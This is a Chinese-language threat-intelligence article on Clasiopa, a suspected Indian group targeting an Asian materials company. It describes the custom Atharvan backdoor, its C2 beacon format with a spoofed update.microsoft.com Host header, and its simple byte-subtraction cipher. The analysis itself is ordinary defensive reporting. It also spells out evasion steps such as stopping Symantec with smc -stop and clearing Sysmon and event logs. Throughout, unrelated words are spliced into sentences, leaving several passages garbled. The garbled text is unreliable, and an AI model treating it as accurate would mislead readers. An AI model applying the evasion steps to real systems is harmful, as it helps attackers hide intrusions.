疑似印度黑客针对亚洲材料行业发起攻击

研究人员发现一个未知的疑似印度亚洲攻击组织以亚洲一家材料行业的公司为攻击目标
，被命名为 Clasiopa。黑客该组织使用独特的针对攻击工具 ，开发了定制化的材料后门 Atharvan 。

Clasiopa 的行业 TTP

尚不清楚 Clasiopa 的攻击媒介是什么，研究人员猜测是发起通过对外开放的服务进行暴力破解获取的源码库访问权限 。

攻击中还有许多特征：

利用 ifconfig.me/ip 获取失陷主机的攻击 IP 地址试图通过停止 SepMasterService 来停用 Symantec Endpoint Protection ，再利用 smc -stop 彻底禁用安全防护软件使用多个后门来外传文件名列表 ，疑似印度亚洲列表存储在 Thumb.db 文件或 ZIP 压缩文件中使用 wsmprovhost 清除 Sysmon 日志使用 PowerShell 清除所有事件日志创建计划任务获取文件名

在一台失陷主机上发现了运行的黑客 Agile DGS 和 Agile FD 服务 ，恶意样本被放置在名为 dgs 的针对文件夹中。与此同时，材料一个后门被从 atharvan.exe 重命名为 agile_update.exe  。行业另一台失陷主机上运行着 HCL Domino 服务  ，发起但并不清楚这是攻击否是巧合。源码下载但这些服务都在使用旧证书，疑似印度亚洲还包含部分存在漏洞的库。

攻击工具

攻击者使用了自研的远控木马 Atharvan，以及开源远控木马 Lilith 的定制版本。此外，攻击者还使用了 Thumbsender 与自定义代理工具。

Atharvan

Atharvan 样本文件在运行时会创建名为 SAPTARISHI-ATHARVAN-101的互斥量 ，因此得名
。

C&C 服务器硬编码在样本中
，位于 AWS 的服务器租用韩国区。POST 请求中，Host 被硬编码为 update.microsoft.com 
。例如：

复制POST /update.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 Edg/84.0.522.52Host: update.microsoft.comContent-type: application/x-www-form-urlencodedContent-length: 46id=Atharvan&code=101&cid=H^[REDACTED]&time=51.2.3.4.5.6.

请求参数如下
：

id：硬编码为 Atharvancode：表示请求目的cid  ：硬编码字符后为失陷主机的 MAC 地址time：通信时间间隔msg ：根据 code 参数不同表示请求目的

在加密 msg 时  ，恶意软件使用以下加密算法 ：

复制def encrypt(plaintext

):

return bytes([((2 - byte) & 0xff) for byte in plaintext])1.2.

恶意软件使用简单的 HTTP 解析工具在服务器响应中提取信息，解密算法如下所示：

复制def decrypt(ciphertext

):

return bytes([((2 - byte) & 0xff) for byte in ciphertext])1.2.

获取命令时，恶意软件预期解密的正文由 \x1A 分隔的字符串组成 。每个字符串的模板下载第一个字节用于指定要执行的命令，其余字节为命令参数：

Atharvan 命令参数

配置计划通信
，命令参数指定时间与日期 ，编码为：

无限制（0x16）指定月中的天（0x17）指定星期几（0x18）

预制的通信模式是该恶意软件的另一个不常见的特征。

归因

目前没有确切的证据表明 Clasiopa 的背景与动机。尽管 Atharvan 在后门中使用了印地语作为互斥体的免费模板名字（SAPTARISHI-ATHARVAN-101），而且 Atharvan 也是印度教的神明。后门向 C&C 服务器发送的 POST 请求为 d=%s&code=%d&cid=%s&time=%dtharvan
，攻击者用于 ZIP 压缩文件的密码为 iloveindea1998^_^。尽管这些细节可能表明该组织位于印度 ，但这些信息也可能是作为虚假 Flag 植入其中  ，尤其是密码似乎过于明显。

云计算